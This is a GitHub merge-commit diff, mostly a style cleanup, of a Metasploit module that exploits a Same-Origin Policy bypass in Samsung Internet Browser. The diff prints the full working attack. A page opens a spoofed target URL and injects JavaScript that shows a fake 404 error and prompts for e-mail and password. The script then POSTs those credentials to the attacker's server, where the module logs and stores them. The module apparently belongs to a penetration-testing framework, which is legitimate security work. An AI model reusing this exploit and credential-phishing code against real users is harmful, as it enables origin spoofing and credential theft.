Merge pull request #3 from todb-r7/pr-9180

Thanks @todb-r7 works perfect !
rapid7 · Dec 16, 2017 · 88a21d1 · 88a21d1
2 parents f0fc1bc + 3b3b0e6
commit 88a21d1
Showing 1 changed file with 29 additions and 28 deletions.
diff --git a/modules/auxiliary/gather/samsung_browser_sop_bypass.rb b/modules/auxiliary/gather/samsung_browser_sop_bypass.rb
@@ -10,7 +10,7 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'           => "Samsung Internet Browser SOP Bypass",
+        'Name'           => 'Samsung Internet Browser SOP Bypass',
         'Description'    => %q(
           This module takes advantage of a Same-Origin Policy (SOP) bypass vulnerability in the
           Samsung Internet Browser, a popular mobile browser shipping with Samsung Android devices.
@@ -26,7 +26,7 @@ def initialize(info = {})
         'References'     => [
         ['URL', 'http://fr.0day.today/exploit/description/28434'],
         ],
-        'DisclosureDate' => "Nov 08 2017",
+        'DisclosureDate' => 'Nov 08 2017',
         'Actions'        => [[ 'WebServer' ]],
         'PassiveActions' => [ 'WebServer' ],
         'DefaultAction'  => 'WebServer'
@@ -36,14 +36,14 @@ def initialize(info = {})
   register_options([
       OptString.new('TARGET_URL', [
         true,
-        "The URL to spoof origin from.",
+        'The URL to spoof origin from.',
         'http://example.com/'
       ]),
       OptString.new('CUSTOM_HTML', [
         true,
-        "HTML to display to the victim.",
-        'This page has moved. Please <a href="#">click here</a> redirect your browser.'
-      ]),
+        'HTML to display to the victim.',
+        'This page has moved. Please <a href="#">click here</a> to redirect your browser.'
+      ])
     ])
 
   register_advanced_options([
@@ -61,35 +61,36 @@ def run
   end
 
   def evil_javascript
-    if not datastore['CUSTOM_JS'].nil? and not datastore['CUSTOM_JS'].empty?
-      js = datastore['CUSTOM_JS']
-    else
-      js = <<-EOS
-        setTimeout(function(){
-          x.document.body.innerHTML='<h1>404 Error</h1>'+
-          '<p>Oops, something went wrong.</p>';
-          a=x.prompt('E-mail','');
-          b=x.prompt('Password','');
-          var cred=JSON.stringify({'user':a,'pass':b});
-          var xmlhttp = new XMLHttpRequest;
-            xmlhttp.open('POST', window.location, true);
-            xmlhttp.send(cred);
-          }, 3000);
-      EOS
-    end
-    return js
+    return datastore['CUSTOM_JS'] unless datastore['CUSTOM_JS'].blank?
+    js = <<-EOS
+      setTimeout(function(){
+        x.document.body.innerHTML='<h1>404 Error</h1>'+
+        '<p>Oops, something went wrong.</p>';
+        a=x.prompt('E-mail','');
+        b=x.prompt('Password','');
+        var cred=JSON.stringify({'user':a,'pass':b});
+        var xmlhttp = new XMLHttpRequest;
+          xmlhttp.open('POST', window.location, true);
+          xmlhttp.send(cred);
+        }, 3000);
+    EOS
+    js
   end
 
   def setup
     @html = <<-EOS
         <html>
         <meta charset="UTF-8">
+        <head>
         <script>
         function go(){
-          var x = window.open('#{datastore['TARGET_URL']}');
-          #{evil_javascript}
+          try {
+            var x = window.open('#{datastore['TARGET_URL']}');
+            #{evil_javascript}
+            } catch(e) { }
           }
         </script>
+        </head>
         <body onclick="go()">
         #{datastore['CUSTOM_HTML']}
         </body></html>
@@ -118,11 +119,11 @@ def collect_data(request)
     cred = JSON.parse(request.body)
     u = cred['user']
     p = cred['pass']
-    if not u.nil? and not u.empty? and not p.nil? and not p.empty?
+    if u.blank? || p.blank?
+      print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
+    else
       print_good("#{cli.peerhost}: Collected credential for '#{datastore['TARGET_URL']}' #{u}:#{p}")
       store_cred(u,p)
-    else
-      print_good("#{cli.peerhost}: POST data received from #{datastore['TARGET_URL']}: #{request.body}")
     end
   end